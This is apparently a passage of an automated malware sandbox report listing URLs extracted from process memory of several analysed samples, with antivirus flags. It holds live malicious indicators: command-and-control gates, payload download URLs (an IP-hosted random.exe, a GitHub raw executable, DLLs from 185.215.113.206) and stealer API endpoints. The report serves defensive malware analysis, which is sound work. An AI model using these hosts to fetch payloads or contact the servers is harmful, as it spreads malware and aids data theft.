                                          https://duckduckgo.com/chrome_newtabEdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://framekgirus.shop/aljyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://duckduckgo.com/ac/?q=EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.gstatic.cn/recaptcha/696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://31.41.244.11/files/fate/random.exeskotes.exe, 00000012.00000003.2747659202.000000000141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.valvesoftware.com/legal.htm696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.youtube.com696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://185.215.113.206LocalDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000F74000.00000040.00000001.01000000.00000006.sdmpfalse
                                                          		high
                                                          https://lev-tolstoi.com:443/apiDH696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloadingskotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmpfalse
                                                            		high
                                                            https://pancakedipyps.click/(64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.2281404457.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2329195901.00000000061B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.00000173398E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.0000017339A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://185.215.113.206/68b591d6548ec281/nss3.dllDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://pancakedipyps.click/364252d274d.exe, 00000024.00000003.2422825618.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://s.ytimg.com;696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://framekgirus.shop:443/apijyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.0000017329871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://rapeflowwj.lat/f696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://steamcommunity.com/profiles/76561199724331900696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://microsoft.cojyidkjkfhjawd.exe, 00000041.00000003.2822393394.000000000075F000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2807665436.0000000000761000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://pancakedipyps.click/apiS64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://contoso.com/Iconpowershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://framekgirus.shop/Njyidkjkfhjawd.exe, 00000041.00000003.2820429213.00000000007C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://www.ecosia.org/newtab/EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lv.queniujq.cn696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4849099979.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.youtube.com/696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000035.00000002.2538930366.0000017329A9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://framekgirus.shop/Pjyidkjkfhjawd.exe, 00000041.00000003.2564282324.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.execbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://lev-tolstoi.com/api696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898729473.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001F.00000002.2276089201.0000000004C16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.00000000052A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.google.com/recaptcha/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://checkout.steampowered.com/696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgEdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://framekgirus.shop/4jyidkjkfhjawd.exe, 00000041.00000003.2509192980.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://pancakedipyps.click/api$64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://pancakedipyps.click/((64252d274d.exe, 00000024.00000003.2344378819.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344227223.0000000003A57000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344051395.0000000003A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://pancakedipyps.click/api#64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://lev-tolstoi.com:443/apiCG696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838267197.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838753795.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4846955753.0000000003491000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          http://185.215.113.206/68b591d6548ec281/vcruntime140.dllDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://185.215.113.206/c4becf79229cb002.phpdDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://help.steampowered.com/en/696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://185.215.113.206/c4becf79229cb002.phpgDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://framekgirus.shop/#jyidkjkfhjawd.exe, 00000041.00000003.2699359734.0000000003ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://energyaffai.lat/api696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://recaptcha.net/recaptcha/;696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://pancakedipyps.click/apibv64252d274d.exe, 00000024.00000003.2430484562.0000000001521000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://185.215.113.206/c4becf79229cb002.phpAZDX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2211683173.0000000000E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://185.215.113.43/Zu7JuNko/index.php7skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    https://broadcast.st.dl.eccdnx.com696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lev-tolstoi.com/apilg696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          http://x1.c.lencr.org/0EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://x1.i.lencr.org/0EdYEXasNiR.exe, 00000000.00000003.1600401718.0000000005FA7000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2363864859.0000000003A75000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824473314.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2586973968.0000000003B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
